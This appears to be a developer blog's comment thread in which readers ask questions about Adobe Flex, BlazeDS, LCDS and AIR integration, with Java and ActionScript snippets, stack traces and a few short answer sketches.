We are trying to connect to an existing backend system which has accessors like isFunction, isNull etc.
Is there any workaround?
Why is it dropping the ‘is’?
Hi Sujith,
I am trying to write an FTP client using flash.net.Socket to write files to the FTP location. The files are written without any problem, but once they are written I need to inform the user that it’s done. Can you please tell me how to do it?
Hi Sujith,
We have a Java web application. I embedded a Flex chart in one of its JSP pages. When I log in to the application and navigate to that JSP, the Flex chart shows up just fine. But after that, if I navigate to a different page in the application, it logs me out, since my login session is lost. How do I keep hold of the login session after the Flex chart is displayed?
I am new to flex, I would really appreciate your help.
Hey Sujit,
I am new to flex and blazeds. I had the following question.
I am trying to pass a complex object from Java to Flex using BlazeDS. I have three classes
public class Phone {
public long number;
public String type;
}
public class Address {
public String city;
public String state;
public String type;
}
public class ContactInfo {
public Phone phone;
public Address address;
}
In another class I have the following two methods; this class is exposed to Flex in remoting-config.xml in BlazeDS.
public Phone getPhoneNumber() {
Phone phone = new Phone();
.. some code..
return phone;
}
public ContactInfo getContactInfo() {
    ContactInfo cinfo = new ContactInfo();
    // ... some code ...
    return cinfo;
}
Above are my classes on Java side and I have similar classes on Flex side.
package object
{
[RemoteClass(alias="Phone")]
public class Phone {
public var number : Number;
public var type : String;
}
}
package object
{
[RemoteClass(alias="ContactInfo")]
public class ContactInfo {
public var phone: Phone;
public var address: Address;
}
}
If I call a Java method from Flex which returns an object of type Phone, I get that object on the Flex side and can access all its data fields. But if I try to access a ContactInfo object, which internally has Phone and Address objects, I get error #1009: Cannot access a property or method of a null object reference.
If I run test code calling the same methods on the Java side, I can print all the values from the ContactInfo object.
Am I missing something when calling a method that returns an object which internally holds other objects instead of standard data types?
Thanks in advance! Any help is appreciated.
—
Rahul
Hi Sujit,
I appeared for the Adobe Flex 3 with AIR exam and cleared the exam with a score of 84 %. I am extremely happy and feel elated that I am now part of the Adobe Certified Expert Community. Your blogs greatly helped me to explore all topics. Thank you.
Hi sujit
I set the focus to the TextInput component (this is a component in a login window). This highlights my TextInput component, but it does not place the cursor in the TextInput.
Please send a solution for my problem.
1) I wrote this code in the html-template\index.template.html file.
2) This is the MXML code:
loginRequest_Click();
3) I wrote this code in the LoginViewAS.as file:
public function setfocus(event:Event):void
{
    if (ExternalInterface.available)
    {
        ExternalInterface.call('setFocus');
    }
    else
    {
        Alert.show("Browser not available");
    }
    this.focusManager.setFocus(LoginView_UserNameTextInput);
    LoginView_UserNameTextInput.text = EMPTY_STRING;
    LoginView_UserNameTextInput.selectionBeginIndex = 0;
    LoginView_UserNameTextInput.selectionEndIndex = LoginView_UserNameTextInput.text.length;
}
Hi Sujit,
I am new to LCDS; just a quick question: is it possible to create joins from LCDS?
I installed LCDS, but when I try to connect to the Java server it shows an unknown error: “my-http” missing. Need help.
Hi,
We are using a BlazeDS turnkey setup which was running perfectly on localhost:80 when viewed from the local machine.
When we change localhost to a fixed IP in the services-config.xml file, the remoting calls return Send Failed. We have tried a few options but no luck so far.
All help is highly appreciated.
Best regards,
Sanjeev
Hi Sujit
I would like to call an MDB from Flex without using BlazeDS or LCDS. What approach do I have to follow? Can you suggest one?
Hi,
I am developing an application in Flex 4. I want to know which one to use as the backend: BlazeDS or PHP?
How can we pause and resume a Timer in Flex?
var timer:Timer = new Timer(10000);
Now I want to pause the timer after 5 seconds if some event occurs, and resume from 5 seconds if another event occurs.
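A minimal sketch, since Timer has no built-in pause: stop() halts it, and tracking elapsed time with getTimer() lets you resume with the remaining delay. The one-shot repeat count and event hooks below are assumptions for clarity:

import flash.events.TimerEvent;
import flash.utils.Timer;
import flash.utils.getTimer;

private var timer:Timer = new Timer(10000, 1); // one-shot for clarity
private var startedAt:int;
private var remaining:Number = 10000;

private function begin():void
{
    timer.addEventListener(TimerEvent.TIMER_COMPLETE, onDone);
    startedAt = getTimer();
    timer.start();
}

private function pause():void
{
    timer.stop();
    remaining -= getTimer() - startedAt; // time still left on the interval
}

private function resume():void
{
    timer.delay = remaining;             // e.g. 5000 ms if paused at 5 seconds
    startedAt = getTimer();
    timer.start();
}

private function onDone(event:TimerEvent):void
{
    // the full interval has elapsed
}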
hi
I have integrated Flex with Java through BlazeDS. It’s a very small program in which I set/get a value to/from a Java class data member. I set the value, but when getting the value from the class through another member function, event.result returns “null” in Flex.
So I have one doubt: can I access the member variable through another function via a RemoteObject?
All functions are declared public in the Java class.
I am new to Flex; I am following your blog.
HI Sujit,
I am using BlazeDS with Spring.
I am using FlexContext.getFlexSession() to access the FlexSession and store some objects there.
But sometimes I get the exception below. Please let me know if you have ever faced the same problem or have any solution.
Thanks
java.lang.IllegalStateException: setAttribute: Session already invalidated
at org.apache.catalina.session.StandardSession.setAttribute(StandardSession.java:1261)
at org.apache.catalina.session.StandardSession.setAttribute(StandardSession.java:1243)
at org.apache.catalina.session.StandardSessionFacade.setAttribute(StandardSessionFacade.java:130)
at flex.messaging.HttpFlexSession.setAttribute(HttpFlexSession.java:458)
at com.barcap.hpscui.serviceImpl.UIQueueImpl.saveUserProfileInFlexContext(UIQueueImpl.java:1081)
at com.barcap.hpscui.serviceImpl.UIQueueImpl.getUserDetailsFromSession(UIQueueImpl.java:1815)
at sun.reflect.GeneratedMethodAccessor595.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:585):1503)
at flex.messaging.endpoints.AbstractEndpoint.serviceMessage(AbstractEndpoint.java:884)
at flex.messaging.endpoints.AbstractEndpoint$$FastClassByCGLIB$$1a3ef066.invoke()
at net.sf.cglib.proxy.MethodProxy.invoke(MethodProxy.java:149)
at org.springframework.aop.framework.Cglib2AopProxy$CglibMethodInvocation.invokeJoinpoint(Cglib2AopProxy.java:700)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:149)
at org.springframework.flex.core.MessageInterceptionAdvice.invoke(MessageInterceptionAdvice.java:59)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171)
at org.springframework.aop.framework.adapter.ThrowsAdviceInterceptor.invoke(ThrowsAdviceInterceptor.java:126)
at org.springframework.aop.framework.ReflectiveMethodInvocation.proceed(ReflectiveMethodInvocation.java:171)
at org.springframework.aop.framework.Cglib2AopProxy$FixedChainStaticTargetInterceptor.intercept(Cglib2AopProxy.java:582)
at flex.messaging.endpoints.AMFEndpoint$$EnhancerByCGLIB$$2e2fe31d.serviceMessage().endpoints.AMFEndpoint$$EnhancerByCGLIB$$2e2fe31d.service()
at org.springframework.flex.servlet.MessageBrokerHandlerAdapter.handle(MessageBrokerHandlerAdapter.java:101)
at org.springframework.web.servlet.DispatcherServlet.doDispatch(DispatcherServlet.java:875)
at org.springframework.web.servlet.DispatcherServlet.doService(DispatcherServlet.java:807)
at org.springframework.web.servlet.FrameworkServlet.processRequest(FrameworkServlet.java:571)
at org.springframework.web.servlet.FrameworkServlet.doPost(FrameworkServlet.java:511)
Hi Sujit,
We are using the BlazeDS libraries to serialize a Java ArrayList (amf3Output.writeObject(arrayList)); on the client side we read the byte stream and cast it to ArrayCollection (event.result as ArrayCollection). This was working fine while we were using Flex SDK 3.1 and BlazeDS 3.2 libs. When we compiled the same code with Flex 3.4.0 and above, Flex no longer recognizes it as an ArrayCollection.
Can you provide any pointers to solve the issue? I appreciate any help.
Hi Sujit.
I’m using Flash and AS3 to develop my applications. I downloaded the library and the helper PDF files but unfortunately I could not run it. I wonder, does it run with Flex only? I’m working at a private company and we want to use your library in a big ERP project. Can you give me an example file or something like that, please?
Best regards.
hi,
I have a Flash application that interacts with a URL. The flow goes like this
(-> refers to redirect, => HTTP POST):
Flash AS3 -> page A.aspx -> page B.aspx -> page C.aspx => page B.aspx -> page A.aspx -> Flash AS3
Page A sends an XML response to Flash.
Now when page C.aspx POSTs data to page B, Flash reads this data and gives the error “Since your browser doesn’t support
javascript, you need to hit the continue button to proceed”.
Actually, we expect Flash to read the XML response from page A.aspx.
I want Flash to read the XML result from page A.aspx. Is there a workaround to get this working?
Dear Sujit,
I am working on a recruiting application; the UI is all Flex and the backend is Java.
I have the prototype, but my UI is poor. If you can recommend a UI expert (person/company) who can create UIs with a cool look and feel, I would appreciate it very much, preferably in Pune or Bangalore.
Looking forward..
regards
Makarand
Hi,
I need to FTP to users’ different FTP locations. It worked fine from my local machine, but when I deployed it on my server it gave SecurityError: Error #2048: Security sandbox violation: cannot load data from myuser.
I kept crossdomain.xml in the server root directory and it is accessible, but the security error is still thrown.
Do I need to do anything else on the Flex side, like loading the crossdomain.xml on application init etc.? Any ideas?
[MessagingError message=’Destination ‘CreatingRpc’ either does not exist or the destination has no channels defined (and the application does not define any default channels.)’]
I have created a 2nd Java class in the same Java project.
In the remoting-config file too I have added the
RemoteServiceHandler destination,
but it isn’t working.
Hi Sujit,
We are using web services to fetch data from a JBoss server. We can fetch data when we call any method with no arguments, but when we call a method with any custom AS class as a parameter, the operation fails with error #1009: Cannot access a property or method of a null object reference.
I made sure that none of the objects are null.
Let me know if there are any issues with this.
Thanks
Hi Sujith,
I am trying to use appendChild; the XML has multiple nodes of the same element. For example, my XML is like this:
var testxml:XML = abc
This is the XML that I have to append:
var appendXML:XML = AB
I have a lot of class nodes that I have to construct dynamically.
When I try testxml.categories.category.appendChild(appendXML),
there is a runtime exception: appendChild works only on lists containing one item. I have tried various other methods. Can you suggest a way to append this XML?
Thanks
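For what it’s worth, that runtime error usually means appendChild() was called on an XMLList with several matches rather than a single XML node. A minimal sketch with hypothetical node names:

var testxml:XML =
    <root>
        <categories>
            <category name="a"/>
            <category name="b"/>
        </categories>
    </root>;

var appendXML:XML = <class id="AB"/>;

// testxml.categories.category is an XMLList with two items, so calling
// appendChild() on it throws the error. Pick a single node instead:
testxml.categories.category[0].appendChild(appendXML);

// or append to the parent to add another <category> sibling:
testxml.categories.appendChild(<category name="c"/>);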
I’m having a problem at exactly 30 seconds with an AIR 2.0/BlazeDS request. The error is not a requestTimeout. Error message:
Any hint how to fix this problem?
Hi Sujith,
I have a problem converting hexadecimal values to integers and displaying the time in Flex.
Here is the sample XML data:
FFFF4A78
FFFF4B4A
FFFF4DBF
Please help in converting this to a readable time format.
Thanks in advance.
Regards,
Ravichandran J
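A minimal sketch of the conversion, assuming the values are 32-bit two’s-complement integers; whether they represent seconds, milliseconds, or some offset is an assumption only the data owner can confirm:

var hex:String = "FFFF4A78";
var unsigned:Number = parseInt(hex, 16);  // 4294920824
var signed:int = int(uint(unsigned));     // -46472 as a signed 32-bit value

// if the magnitude were elapsed seconds, formatting could look like:
function toHMS(totalSeconds:int):String
{
    var s:int = Math.abs(totalSeconds);
    var h:int = int(s / 3600);
    var m:int = int((s % 3600) / 60);
    var sec:int = s % 60;
    return h + ":" + (m < 10 ? "0" + m : m) + ":" + (sec < 10 ? "0" + sec : sec);
}
trace(toHMS(signed)); // 12:54:32 for 46472 seconds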
Hi Sujith,
I am learning Flex and integrating Flex with Java using BlazeDS. We are planning to move to Flex and remove the Java Swing UI.
I have the following query.
I have read that polling and long polling are possible,
but I was not able to find any sample examples.
My requirement is: from Flex, I call a Java method. In Java, I do the processing and send a notification to Flex (the client), and Flex shows it in the UI. The notification I send should have a common structure which both Flex and Java can understand; the structure will have a type for the notification and a value.
How can I do it? Can you help with sample examples of both polling and long polling, where the server is in Java and uses BlazeDS?
It would be helpful for me and many others.
Regards
Srini
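A minimal client-side sketch: whether the channel uses simple polling or long polling is decided in services-config.xml, so the Flex code is the same Consumer subscription either way. The destination name and message-body fields below are assumptions; the Java side would publish AsyncMessages whose body carries the shared structure, e.g. { type: "PROGRESS", value: 42 }:

import mx.messaging.Consumer;
import mx.messaging.events.MessageEvent;

private var consumer:Consumer = new Consumer();

private function subscribe():void
{
    consumer.destination = "notifications"; // hypothetical messaging destination
    consumer.addEventListener(MessageEvent.MESSAGE, onMessage);
    consumer.subscribe();
}

private function onMessage(event:MessageEvent):void
{
    var type:String = event.message.body.type;   // assumed field names
    var value:Object = event.message.body.value;
    // update the UI based on the notification type/value
}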
Hi Sujit,
I have a requirement in my project to create my own FlexSession on the web server.
Is that possible?
Please let me know if I can do this.
Thanks in Advance.
Hi Sujith,
I’m using the AS3 library for the Google Calendar API.
How can I retrieve my existing calendars?
Do I call the getAllCalendars(userVO) void function, and then how do I access the allCalendars variable that contains my calendars?
Hi Sujith,
I can do authentication and get my calendars, but I can’t add an event to the selected calendar.
Can you help me?
Can you post an example with authentication, retrieving calendars, and adding an event to a calendar?
Thanks in advance
Hi Sujit,
I’m following your site and posts regularly. It helped me a lot with Flex initially. For the past 2 years I’ve worked on many Java and Flex projects with the help of evangelists like you. Actually I don’t have any questions for you today; I just wanted to greet and thank you. Keep rocking!
Thanks,
Pothiraj
Hi,
I am working with Flex 4 and BlazeDS.
On the server side I have a method that receives a string and returns the result of a SQL query as an ArrayList.
The results are from a different table each time, depending on the string I send.
In the result I put the column names in position 0.
When I try to change the columns property of the DataGrid, I receive no data in the DataGrid.
Below is the code of the handler.
What can cause this?
Thanks
private function resultHandler(event:ResultEvent):void {
    data = event.result as ArrayCollection;
    Alert.show(data.length.toString());
    // row 0 carries the column names, e.g. "id,name,city"
    var columnNames:String = data.getItemAt(0).toString();
    var columns:Array = columnNames.split(",");
    var columnArray:Array = new Array();
    for (var i:int = 0; i < columns.length; i++) {
        // the constructor argument becomes both headerText and dataField,
        // so each data row must expose properties with these exact names;
        // plain comma-separated strings will render as empty cells
        var dataGridColumn:DataGridColumn = new DataGridColumn(columns[i]);
        columnArray.push(dataGridColumn);
    }
    data.removeItemAt(0); // drop the header row from the data itself
    dataGrid.columns = columnArray;
}
Hi Sujit,
I need some information regarding LCDS: how to get the license, what the cost is, what kind of license it is, how to install it and so on.
Can you please help me with this?
Thanks in Advance
Naveen
I want to export an AdvancedDataGrid to a CSV file. I wrote code that works quite well, but I face a problem: it does not generate the hierarchical data or the grouped columns in the CSV file. If anyone has a solution, please help.
Hi Sujit,
I have been struggling with Flex and BlazeDS.
Uzair
Hi Sujit,
I’m building a Flex application with BlazeDS/LCDS on the back end. Currently I have a small problem with uploading files to the server.
There are two ways to upload a file to the server:
1) Load the selected file into an object and send it through a RemoteObject to the server. This option works for me, because the server backend receives the object with my file, and all security rules and session data are accessible (whether the user is logged in or not, session data about the user). But there are cons: I need to load the whole file into Flash Player, and if the file is big, Flash Player freezes for a while. Another con is that I lose the upload progress (e.g. for a progress bar).
2) Create an upload servlet and upload the selected file via fileReference.upload(URLRequest). With this option I get upload progress and the Flash client does not freeze, because the file is uploaded in the background. But there are cons too: I can’t access the FlexContext, so I lose authorization and session data.
I’m not sure which option to choose. The second solution is better for users, because they see the upload progress, but it is a security risk for me, because I can’t access the FlexContext.
A solution would be to somehow tie my upload servlet to the FlexContext, but I don’t know how to do this.
Thanks for any help.
Peter
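A minimal sketch of option 2, assuming a hypothetical upload servlet URL; one common workaround for the lost FlexContext is to fetch a one-time token over RemoteObject (where the session is available) and send it with the upload, so the servlet can tie the request back to the user. The token parameter and progressBar id are assumptions:

import flash.events.Event;
import flash.events.ProgressEvent;
import flash.net.FileReference;
import flash.net.URLRequest;
import flash.net.URLRequestMethod;
import flash.net.URLVariables;

private var fileRef:FileReference = new FileReference();
// call fileRef.browse() first and wait for Event.SELECT before uploading

private function upload(token:String):void
{
    var request:URLRequest = new URLRequest("http://localhost:8400/myapp/upload");
    request.method = URLRequestMethod.POST;
    var vars:URLVariables = new URLVariables();
    vars.token = token;                 // hypothetical one-time auth token
    request.data = vars;

    fileRef.addEventListener(ProgressEvent.PROGRESS, onProgress);
    fileRef.addEventListener(Event.COMPLETE, onComplete);
    fileRef.upload(request);
}

private function onProgress(event:ProgressEvent):void
{
    progressBar.setProgress(event.bytesLoaded, event.bytesTotal); // assumes a manual-mode mx:ProgressBar
}

private function onComplete(event:Event):void
{
    // upload finished
}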
Sujit,
I have a Flex client which only uses HTTPService for RPC. We don’t have BlazeDS as of now.
In order to use messaging, I will be using BlazeDS. Is there a way to make sure that talking to BlazeDS (using Consumers with short polling) doesn’t reset my usual client session? In other words, if client X is logged in and I make server calls through a Consumer (short-polling mechanism), it should not affect the client’s session at all. Is that possible?
Hey Sujit,
I am a bit of a novice in Flex. I have everything working with BlazeDS, but I am having trouble setting the order in which my internal Flex containers/components load. They each get data from my Java app server, and I would like them all to contact the app server at the same time and then become visible as each one completes. Right now it follows a serial order. We are using states, and it seems the child-most component loads first and then it goes upwards. I hope you understand what I mean; the code is huge, so I can’t post it.
Hi Sujit,
I have managed to sort out the issue and my application runs perfectly now. Anyway, thanks for all the brilliant material here.
I have another question. I have a chart and I am passing values to draw lines through an array. What I want to do is also draw DOTS (points) over the same line graph, but for the dots the data will come from a SQL data source. Is there any way to use two data sources for the same graph, where the first draws the lines and the second plots dots over the same graph? Or is there any other way to do this?
Thanks in advance.
Kind Regards,
Uzair
Hi sujith,
I am new to Flex and trying a sample application.
Below is the issue I’m facing.
I have 2 projects in Flex Builder:
the 1st project is used for the UI,
the 2nd project maps to the Java classes (interfaces, .as files).
I have given a project reference from project 2 to project 1, and I have taken the SWF and HTML files from project 1 and placed them in Eclipse to test the UI and service changes together.
Issue:
I removed a couple of methods in project 2 (the calls and their implementation logic), but when running in Eclipse it gives an error saying “method not found”. It looks like the changes I made in project 2 are not picked up in Eclipse.
Can you please advise me on this?
Hi Sujit,
I have managed to solve the second problem as well (using two different data sources from two different places) and it’s working perfectly now.
Now my question is: currently I am plotting both data sources as LineSeries in a LineChart, but in the same LineChart I want to show data from one data source as lines and data from the other as DOTS. Please give me some suggestions on how to achieve this.
Thanks in advance.
Regards,
Uzair
Hi Sujith,
I want to do the Adobe Flex certification. Can you please guide me on how to do that, and are there any mock test papers for the Flex certification?
Thanks in advance……
I followed the example in this:
Now while starting Tomcat I get this error:
MessageBrokerServlet in application ‘BlazeDS’ failed to initialize due to runtime exception: Exception: flex.messaging.config.ConfigurationException: adapter not found for reference ‘RandomDataPushAdapter’ in destination ‘RandomDataPush’.
Not sure where I’m wrong; I have checked services-config.xml and messaging-config.xml.
Any pointers?
Hello,
We are developing a tool which automates and executes command-prompt commands. This tool is specific TO OUR PROJECT FRAMEWORK. We are facing a few difficulties. Below is the code snippet.
protected function updateTargets(targets:String):void {
    var file:File = File.documentsDirectory;
    // TODO: relative path
    file = file.resolvePath("C:/Users/224439/Documents/TM1/MaestroCommands/meastroCommand.properties");
    var fileStream:FileStream = new FileStream();
    fileStream.addEventListener(Event.CLOSE, executeCommands); // listen before opening
    fileStream.openAsync(file, FileMode.WRITE);
    fileStream.writeUTFBytes("command.targets=" + targets);
    fileStream.close();
}
The code above with resolvePath() works fine when an absolute path is given, but we want meastroCommand.properties to be generated in the Flex-AIR project directory itself. We have tried resolvePath with documentsDirectory, applicationDirectory, desktop, applicationStorageDirectory etc., but it creates meastroCommand.properties outside the project. Could you please guide us on this ASAP? It would also be helpful to know about any alternative API which may help in setting a relative path.
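A minimal sketch using AIR’s predefined directories instead of a hard-coded absolute path; File.applicationDirectory is read-only on most systems, so applicationStorageDirectory is the usual home for generated files (the subfolder name below just mirrors the snippet above):

import flash.events.Event;
import flash.filesystem.File;
import flash.filesystem.FileMode;
import flash.filesystem.FileStream;

var file:File = File.applicationStorageDirectory.resolvePath(
    "MaestroCommands/meastroCommand.properties");
file.parent.createDirectory(); // ensure the folder exists (no-op if it does)

var stream:FileStream = new FileStream();
stream.addEventListener(Event.CLOSE, executeCommands); // assumed to be the handler above
stream.openAsync(file, FileMode.WRITE);
stream.writeUTFBytes("command.targets=" + targets);
stream.close();
trace(file.nativePath); // shows where the file actually lands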
Hi Sujit,
Is it possible to intercept ActionScript object responses from, and construct ActionScript object requests to, a third-party server?
I do not have access to the server and do not know the structure of their objects.
I believe it is possible without deploying a crossdomain.xml file to the third-party server, using HTTPService.useProxy = “true”.
So, with this, is it possible to create a Java app client that would interact with their server the way their client Flex app does?
Again, I have no access to their server and know nothing of their object structures or API, other than what I can see using Firebug to watch the wire while using their Flex app.
I am very much looking forward to your response.
Thank you,
David
Hello Sujith,
I am using ColdFusion 9 and I am trying to send and receive messages (client to client) in Flex using Producer and Consumer.
I am using the cf-polling-amf channel and the ColdFusionGateway destination.
I am a bit lost and stuck with this error:
“Unable to find ColdFusion gateway ‘cfgateway’ in RMI registry on host localhost. The gateway may not be running.”
I read that RMI is used with LCDS, but LCDS is not installed by default with CF9; BlazeDS is.
So what do I need to do in order to get this working?
Thanks a lot,
Regards from Belgium,
Aubry
Hi Sujit,
I am new to Flex, so please excuse me if my questions don’t make much sense.
I would like to make an application whose front end is Flex and whose back end is Java. I am not using any web server, hence I am not sure whether BlazeDS makes sense here or not. I have complex core Java code consisting of many classes, and I would like to call the Java code from Flex/ActionScript.
Can you please help me understand this? I would appreciate your help!
Thanks.
Hi Sujit:
My situation is this: my team is developing a Flex 3/BlazeDS application that uses remote objects to write/read the database, and producers/consumers to inform other instances of the same app that the database has been modified so they update themselves (I/the clients can’t afford LCDS). Another team is developing a different application that also runs on BlazeDS/Flex 3. Now we need to add a messaging system, very similar to forum threads, that can be shared between the two applications. What we want to do is share remote objects/messaging channels between the two completely separate Flex/BlazeDS projects, so we only need to write/update one set of Java classes that do the forum-thread database writing, as well as create a shared messaging channel between the two different Flex apps.
We used your Blaze Monster and we were able to communicate with it from our separate applications; when we added the code it generated to a non-BlazeDS Flex project it also worked perfectly, but when we added that code to a BlazeDS/Java Flex project we got a sandbox security error. Also, this only worked for remote objects and not for messaging channels.
We have been searching around but have not found any examples of people doing cross-application communication, so if you could guide us in the appropriate direction we would be thankful.
Hello Sujit,
I want to create an application using Flex 4 and BlazeDS in which I want to sync client-server data (data push). Can you please guide me on how I can achieve this?
Thanks
Hi Sujith
This is Chaitanya. I am having a problem with the validateNow() function on an object which contains a huge custom DataGrid. The DataGrid contains more than 2500 rows of data. I am getting the following error:
“Error: Error #1502: A script has executed for longer than the default timeout period of 15 seconds.
at mx.managers.layoutClasses::PriorityQueue/removeLargestChild()[C:\autobuild\3.5.0\frameworks\projects\framework\src\mx\managers\layoutClasses\PriorityQueue.as:145]”
The code works great if the DataGrid has fewer than 100 rows.
Need help badly.
Just to update: I have solved my problem. Thanks anyway.
What is the easiest way to configure a Flex-Spring-Hibernate project in Eclipse?
hi Sujit,
I am new to Flex. I am trying to call a Java function from a Flex button click,
but I am getting a “Send failed” error. Can you please help me? I followed your example but am getting this error; please give me some idea.
Hi Sujith,
I am using the Flash Builder profiler, but I am trying to understand what the (%) values mean, especially in the context of cumulative instances and memory. Any insight into this would be greatly helpful.
Regards
-Chandu
Hello Sujith,
After a lot of research and copy/paste from Google, I finally decided to post here, which means I am totally desperate.
I have a dev environment on a Windows platform with Apache/PHP/MySQL and Flash Builder 4. I am using the Zend Framework to communicate with PHP classes from ActionScript. Locally, everything works perfectly: PHP works and content is correctly updated in my Flex app.
But I have a problem when I deploy the application to my (Linux) server.
I just export my Flex app as a release build and modify amf_config.ini, and I am sure my configuration is correct.
Zend Framework is correctly installed.
Class “xxxxxx” does not exist: Plugin by name ‘xxxxxx’ was not found in the registry; used paths: : /xxxxxx/www/services/
The path is correct and my services are in the “services” folder, but Zend does not find the classes. Is there a difference between Zend Framework running on Windows and on the deployment server?
Can you help me?
Thanks a lot.
Regards.
Akash
Hi Sujith,
How can I pass a value object to the Java side using RemoteObject? Can you please give me a small example of this?
We can send a plain name (a String) to the Java side easily.
In the same way I want to send a value object to the Java side using RemoteObject. Can you please tell me how?
Thanks
Chowdary
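A minimal sketch, with hypothetical names throughout: the [RemoteClass] alias must match the fully qualified Java class name so BlazeDS can convert the object in both directions.

// CustomerVO.as
package vo
{
    [RemoteClass(alias="com.example.vo.CustomerVO")] // must match the Java class
    public class CustomerVO
    {
        public var name:String;
        public var age:int;
    }
}

Then the instance is passed like any other argument, assuming an mx:RemoteObject with id remoteObject pointing at a destination whose Java class has a saveCustomer(CustomerVO) method:

var vo:CustomerVO = new CustomerVO();
vo.name = "Chowdary";
vo.age = 30;
remoteObject.saveCustomer(vo); // BlazeDS deserializes it into the Java CustomerVO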
Hi Sujit,
I have a requirement to implement a feature providing on-screen help related to a panel/control/form (using F1). With this feature, a user of my application can get information on a particular portion of the screen.
I am using Flex 4 + Cairngorm 3 + BlazeDS + Spring + Hibernate.
Thanks & Regards,
Prakash.
hi Sujith,
I am working on a Flex DataGrid with a pagination feature. I also want copy-and-paste functionality from the DataGrid to Excel.
Do you have any article on this, or can you point me to some resources?
Thanks
Hi sujit,
I’m an undergrad intern doing my project in Flex and Struts. I don’t have any experience working in either technology. Can you help me out by providing example code for a CRUD app using Flex 3, Struts and Oracle 10g? I have managed to connect Flex and Struts using FStruts but I can’t figure out the next move. I tried your post –
But I wasn’t able to connect to the database. It feels tough 😦 Well, in case you know any reference books or links that might help, please post them too! Thanks in advance.
I am a Java developer and I know Flex basics. I have a requirement to connect to JSP from Flex without using LCDS & BlazeDS. Can you please tell me how this is possible? If possible, send me an example.
Regards,
Chowdary
Sujith,
I am developing an application for sailboat racing whereby racers provide their location via a Flex application, and the locations are distributed to a viewing application.
Would you recommend BlazeDS? There would need to be queuing and logging.
thanks
Hi,
I have a datagrid, but the vertical line between the
header rows and the data rows is not continuous; there is a slight angle. Because of this I am not able to resize the column/header width. What CSS attribute controls this alignment?
Sujith,
I need to get the session in a Java web service. In Java I am using the XFire framework. I then need to pass this session to the Flex client side; please help me
and give me an idea.
thanks for advance
Hi Sujit,
I am using a datagrid with resizableColumns set to true. I can drag and resize columns with ease on my local setup, but when I deploy the same app in my dev environment the dragging feature does not work and I cannot resize the columns. I noticed that usually the vertical line separator in the header section is continuous with the data rows' vertical separator, but in my dev environment it is not continuous; there is a very slight angle between the two lines. Is that the cause? Is there any CSS attribute that controls this property?
Hi Sujith,
I want to migrate my Flex 3 application to Flex 4.
Which component set should I choose for this new project?
There are two component sets:
1. mx + Spark
2. mx only
I can go with either option, but I would prefer the one which will not create any performance issues.
Can you please tell me which is the better one, or
if you have a blog post related to this, please give me the link.
Thanks
Krishna
Hi,
Can you please help me with this:
com.ibm.ws.webcontainer.servlet.ServletWrapper init SRVE0100E: Uncaught init() exception created by servlet Service in application PG2Ear: java.lang.VerifyError: JVMVRFY027 receiver is incompatible with declaring class; class=javax/xml/marshal/StreamScanner, method=fail(ILjava/lang/String;)V, pc=97
I have migrated a web application from WAS 6.0 to WAS 7.5.4.
Please help me with this ASAP if possible.
Regards,
Akash Srivastava.
I have been trying to integrate a Flex app that runs on my Apache 2.2 server with a BlazeDS servlet on Tomcat on the same box. I am using PHP and would prefer to keep it, so just moving my whole site to the Tomcat server is not an option. I have an AJP13 connection set up and my Apache server can process JSP files in this manner, but I have been unable to redirect my Flex files to the servlets. I could have them access Tomcat more directly, but I believe I would need a cross-domain file and I am under the impression these are not good. Have I been going about this setup correctly? Most of the material I have read only seems to mention the Flex app running on the Tomcat server. Thanks,
Hi,
I am an application developer in Microsoft .NET technologies.
I am new to Adobe and wish to develop applications for BlackBerry mobile and the BlackBerry PlayBook.
Please guide me on which tools I need to learn and how to go about it. Is there any training institute/workshop which I can attend?
I am located in Delhi/Noida.
Thanks.
Hi Sujith,
I want to create a simple chat room application in Flex, but on my server I need to know which users are online, so that whenever a client connects to the application they will see the list of available users. Can you show me a Java example of this?
thankss
Hi All,
I want to move all libraries from WEB-INF/lib to some external folder, but when doing so the server throws a "no such class found" exception due to the entry below in web.xml:
flex.messaging.HttpFlexSession
I have included flex-messaging-core.jar in the external folder but am still getting this error.
What do I need to change in the configuration so that it will refer to my external lib folder?
Thanks
Hello sir
I am using AMFPHP and Flex.
Whenever I give the URL in the remote object endpoint API, it works fine.
But when I place AMFPHP on the server and try to access it from my PC by giving the URL with that server IP, it will not access the server's AMFPHP file.
Why?
I need to show a demo to a client. Please reply soon.
thank you
Hi Sujith,
I need to sync changes happening in the server object model to the currently loaded clients (might be only a few, it depends) (a DataGrid on the client).
Can you suggest the best way to go?
Should I go with the LCDS messaging feature or the Data Management Service feature?
If it is the messaging feature, which channel should I use for performance (huge volume of data)?
Please reply.
Thank you
I watched your episode: Advanced Data-Centric Application Development with Flash Builder and I was very impressed with this technology. I have also watched many Flash Builder training videos.
I am a project manager for a POS (Point of Sale) company. Currently we offer a POS application written primarily in Cobalt for the MS Windows environment on touch screen hardware. We are using "Windows POSReady 2009" as the operating system but would like to offer our application on other platforms. Our POS system works in both single-client and multi-client environments, as well as multi-revenue environments with single or multiple clients in each revenue center. For example: Revenue Center 1 (1 client), Revenue Center 2 (3 clients), Revenue Center 3 (2 clients), etc., all pointing to one server.
I would like to move this POS application over to a Flash application but I want to make sure that the Flash technology will meet all our needs, Please let me explain what these needs are with regards to what we call a thick client concept.
Our application works as a client server application with an Admin portal application that handles all changes to the client. The client handles all POS operations in a retail environment. This includes, Cash, Credit Card, Gift Card (Magnetic, Barcode, Proximity Chip, etc..), Per diem (Transaction, daily, Weekly and Monthly limits that reset), Payroll deduction transactions (Using a ID Badge (Magnetic, Barcode, Proximity Chip, etc..) and Company Department Charges using an ID #.
With Payroll Deduction, Gift Cards, and other Declining and Per Diem transactions, there needs to be a way to verify per diem limits, declining balances and Department Charge Limits using an ID system.
Every transaction is synchronized with the server and can operate regardless of the server's online/offline status. If the server is offline then all transactions are just stored locally until the server is back online. This also means the customer database that holds customer information needs to be available even when the server is offline. Both the customer ID number and the badge number can be the same number (but in many cases are different), but they do need to be unique from other ID numbers, like gift cards and other declining balance cards. Currently all IDs are stored in one database, but this could change and should change in my opinion. I think a database for employees, another database for company departments, another for gift cards, etc.
